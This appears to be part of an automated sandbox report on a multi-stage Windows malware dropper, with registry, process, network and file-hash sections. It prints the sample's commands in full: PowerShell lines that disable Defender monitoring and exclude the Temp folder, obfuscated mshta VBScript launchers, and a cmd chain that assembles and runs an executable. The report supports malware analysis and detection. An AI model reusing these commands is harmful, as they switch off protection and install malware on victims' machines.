Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 540 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2676 wrote to memory of 2624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2640 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe

Wed062a0488e6dd1.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe

Wed067fa7edd4b875a.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe

Wed0625413f2fb.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe

Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe

Wed068cfd71e196da.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe

Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe

Wed06d8092a5ae.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe

Wed0639114ac9fa.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06384ea2548.exe

Wed06384ea2548.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 272

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe

Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GN9NQ.tmp\Wed067fa7edd4b875a.tmp" /SL5="$601E0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe

Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF """" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp" /SL5="$3018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"

C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe

05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /im "Wed062272ee8a02b1746.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h"" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT ( "wScriPT.shEll" ). Run ("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n " , 0 , TrUe ))

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\M9WDkH25.n

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 456

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 mooorni.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:49262 tcp
N/A 127.0.0.1:49264 tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 propanla.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.20.3.235:443 pastebin.com tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp

Files

\Users\Admin\AppData\Local\Temp\7zSC12262D6\setup_install.exe

MD5 35799316b448a835e4784fbdd26b5648
SHA1 fc39b78cc7615b4cbc65aff8b4d14d7b1b234cd5
SHA256 2a41d70eb106e926765798e9a407e88e49c07099247cd33924d7faa60e3e7ef0
SHA512 ae2d8b3bccbe0e7820ba6c25d76251c400b40a40fbd610b182ae8ec51154e66670b30cf13a62d06067024e9ffb9447bea6647be312e2c01f0ac6c4ea602a9660

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2640-54-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2640-63-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2640-62-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2640-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2640-72-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2640-68-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2640-71-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2640-70-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2640-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2640-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2640-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2640-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2640-64-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC12262D6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zSC12262D6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2640-50-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06dffacb42ccf1c.exe

MD5 cf1ef22fba3b8080deab8dd3ec2dbe79
SHA1 62c57835497002d7f760fabb77969281b4ccf3e0
SHA256 0826cf8b1478cc5c892d724e30c9d69a0fd765780f916bb0943d73f3cd3866e0
SHA512 7a997cbbbdccc75a624ee9f67632024479fdb7a1588c462479c0d4b967373290640bd6b98d08f633d5e71d026faf5343de1d3a61c125e1a04d5ea518275a9e1f

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0625413f2fb.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed062a0488e6dd1.exe

MD5 c950dfa870dc50ce6e1e2fcaeb362de4
SHA1 fc1fb7285afa8d17010134680244a19f9da847a1
